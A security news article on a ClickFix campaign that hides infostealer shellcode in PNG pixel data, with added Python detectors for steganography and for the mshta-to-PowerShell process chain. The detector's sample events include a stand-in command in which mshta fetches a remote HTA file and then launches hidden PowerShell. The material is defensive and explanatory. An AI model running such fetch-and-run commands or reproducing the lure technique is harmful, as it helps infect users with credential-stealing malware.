Cybercriminals have rapidly pivoted to a new evasion technique following Microsoft’s recent crackdown on malicious email attachments. Just weeks after Outlook began blocking inline Scalable Vector Graphics (SVG) files, attackers are now hiding malware inside the pixel data of Portable Network Graphics (PNG) images, a method known as steganography.
Security researchers at Huntress identified the shift as part of a broader “ClickFix” campaign, which uses social engineering to bypass browser protections. By embedding encrypted code within specific color channels of seemingly harmless images, threat actors can evade standard detection tools that scan for script-based threats.
Despite “Operation Endgame,” a coordinated law enforcement action targeting botnet infrastructure earlier this month, the campaign remains highly active. Active domains hosting the new PNG-based lures continue to distribute the Rhadamanthys infostealer, suggesting the group’s resilience against takedown efforts.
From Scripts to Pixels: The Steganography Shift
Attackers are abandoning, or at least complementing, XML-based SVG scripts in favor of pixel-based PNG steganography. This tactical shift correlates directly with Microsoft’s October decision to block inline SVG images in Outlook to combat phishing.
Unlike SVGs, which rely on text-based scripts easily flagged by filters, the new method hides malicious code inside the visual data of the image itself.
Employing a custom algorithm, the loader repurposes standard image data structures to conceal its payload. Describing the mechanics of the new payload delivery system, Ben Folland and Anna Pham, researchers at Huntress, explain that “the malicious code is encoded directly within the pixel data of PNG images, relying on specific colour channels to reconstruct and decrypt the payload.”
Once extracted, the payload is decrypted in memory, bypassing disk-based detection mechanisms. Such memory-only execution paths are particularly effective against Endpoint Detection and Response (EDR) systems, which primarily monitor file writes to the disk.
By keeping the malicious code ephemeral and volatile, attackers significantly reduce the window for forensic capture. Highlighting the forensic challenges posed by this technique, Huntress researchers note that “a notable discovery during analysis was the campaign’s use of steganography to conceal the final malware stages within an image.”
Finally, a .NET assembly is reflectively loaded to inject the payload into `explorer.exe`.
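As an added defensive example (not code from the article or from Huntress), the check below scores the least-significant-bit plane of each colour channel separately: it assumes the PNG has already been decoded into a list of (R, G, B) tuples, for instance with Pillow's `Image.open(path).convert("RGB").getdata()`, and it uses a constructed dialog-style graphic in which the LSBs of one channel are randomised to stand in for an encrypted payload.

```python
import math
import random
from collections import Counter

def lsb_plane_entropy(values):
    """Shannon entropy (bits per byte) of one channel's least-significant-bit
    plane, packed eight pixels per byte. Flat synthetic artwork gives a highly
    repetitive plane; ciphertext written into the LSBs looks like random bytes."""
    packed = []
    for i in range(0, len(values) - 7, 8):
        byte = 0
        for value in values[i:i + 8]:
            byte = (byte << 1) | (value & 1)
        packed.append(byte)
    n = len(packed)
    return -sum(c / n * math.log2(c / n) for c in Counter(packed).values())

def suspicious_channels(pixels, threshold=6.0):
    """Names of the RGB channels whose LSB plane is close to random."""
    return [name for idx, name in enumerate("RGB")
            if lsb_plane_entropy([p[idx] for p in pixels]) >= threshold]

def make_lure_like_image(width=128, height=64):
    """Constructed sample: a synthetic dialog-style graphic with flat colour
    bands, the kind of artwork a lure page uses, rather than a noisy photo."""
    pixels = []
    for y in range(height):
        for x in range(width):
            if y < 16:
                pixels.append((0, 120, 215))      # title bar
            elif x < 8 or x >= width - 8:
                pixels.append((230, 230, 230))    # window border
            else:
                pixels.append((255, 255, 255))    # body
    return pixels

def simulate_embedding(pixels, channel=2, seed=7):
    """Randomise the LSBs of one channel (default: blue) to reproduce the
    statistical footprint of an encrypted payload; no real payload is encoded."""
    rng = random.Random(seed)
    out = []
    for p in pixels:
        p = list(p)
        p[channel] = (p[channel] & 0xFE) | rng.getrandbits(1)
        out.append(tuple(p))
    return out

if __name__ == "__main__":
    clean = make_lure_like_image()
    print("clean:", suspicious_channels(clean))                         # []
    print("embedded:", suspicious_channels(simulate_embedding(clean)))  # ['B']
```

The heuristic suits flat synthetic artwork like lure graphics; a noisy photograph has a high-entropy LSB plane in every channel, so there the channels should be compared against each other rather than against a fixed threshold.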
The ‘ClickFix’ Trap: Weaponizing User Trust
Leveraging a technique dubbed “ClickFix,” the attack mimics a legitimate Windows error or update screen. Victims are presented with a fake “Windows Update” interface that appears to stall or fail. To “fix” the issue, users are instructed to open the Windows Run dialog (Win+R) and paste a command.
This technique relies on no software exploit at all; it leverages a low-tech loophole in user behavior. Underscoring the low barrier to entry, Huntress researchers highlight the simplicity of the approach.
JavaScript embedded in the lure page automatically populates the clipboard with the malicious command. Such tactics circumvent browser security controls like SmartScreen, which typically flag malicious downloads but not manual command execution.
To mitigate this specific vector, administrators can disable the Run box by setting the NoRun policy value in the registry with the following command:
`reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f`
Dependence on manual user input marks this as a “human-centric” exploit rather than a technical vulnerability in Windows.
Technical Breakdown: Inside the Loader
Initiating the infection, an `mshta.exe` command is executed via the Run box. This command retrieves a remote HTA file, which then executes a PowerShell script. Upon execution, the script decrypts and loads a .NET assembly directly into memory. The Huntress technical analysis details the subsequent loading process:
“The 3rd-stage .NET assembly acts as a loader for the 4th stage, which is stored as shellcode using steganography within an embedded encrypted PNG file.”
“The C# code to facilitate shellcode injection is also stored encrypted within the .NET assembly itself and is compiled into another .NET assembly, which is reflectively loaded at runtime.”
The final payload (Rhadamanthys or LummaC2) is packaged and run as shellcode produced with Donut, a shellcode generation tool.
Analysis reveals the use of “trampoline” code with thousands of empty function calls to frustrate reverse engineering efforts. Reflective loading ensures the malware operates almost entirely in memory, leaving minimal forensic traces on the disk.
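A detection check for the chain described above (Run box, then mshta.exe fetching a remote HTA, then PowerShell), as an added example that is not from the article or from Huntress; it runs over constructed Sysmon-style process-creation events with placeholder paths and URL, and assumes telemetry that records the image, parent image and command line of each new process.

```python
# Constructed Sysmon-style process-creation events (placeholder paths and URL).
SAMPLE_EVENTS = [
    {"ProcessId": 1200, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\winlogon.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 4410, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://lure.example/update.hta"},
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -c <placeholder script>"},
    {"ProcessId": 5000, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta C:\Tools\local.hta"},  # local HTA, not the remote chain
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a verdict string for one event, or None if no rule matches."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmd = event["CommandLine"].lower()
    # Commands typed into the Run box run with explorer.exe as their parent, so
    # explorer -> mshta with a URL argument is the first visible ClickFix step.
    if image == "mshta.exe" and parent == "explorer.exe" and "://" in cmd:
        return "explorer.exe launched mshta.exe with a remote HTA"
    # The HTA hands off to PowerShell, which loads the .NET stage in memory.
    if image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
        return "mshta.exe spawned PowerShell"
    return None

def detect(events):
    """List of (ProcessId, verdict) for every event that matches a rule."""
    hits = []
    for event in events:
        verdict = classify(event)
        if verdict:
            hits.append((event["ProcessId"], verdict))
    return hits

if __name__ == "__main__":
    for pid, verdict in detect(SAMPLE_EVENTS):
        print(pid, verdict)
```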
Resilience Against ‘Operation Endgame’
Despite the high-profile Operation Endgame takedowns in mid-November, the campaign remains active and the threat actors have kept a functional foothold: Huntress researchers confirmed that multiple domains hosting the Windows Update lure are still operational. Confirming the infrastructure’s survival, Ben Folland and Anna Pham observe that “as of November 19, multiple active domains… continue to host the Windows Update Lure page associated with the Rhadamanthys campaign.”
Recent ESET data indicates a 500% surge in ClickFix attacks in Q4 2025, suggesting the tactic is gaining popularity among cybercriminals. Decentralization allows the botnet infrastructure to weather centralized takedown attempts.
Such persistence shows the limitations of law enforcement actions against modern, distributed malware networks. Rapid pivoting, from SVGs to PNGs, and from one C2 server to another, demonstrates high operational agility.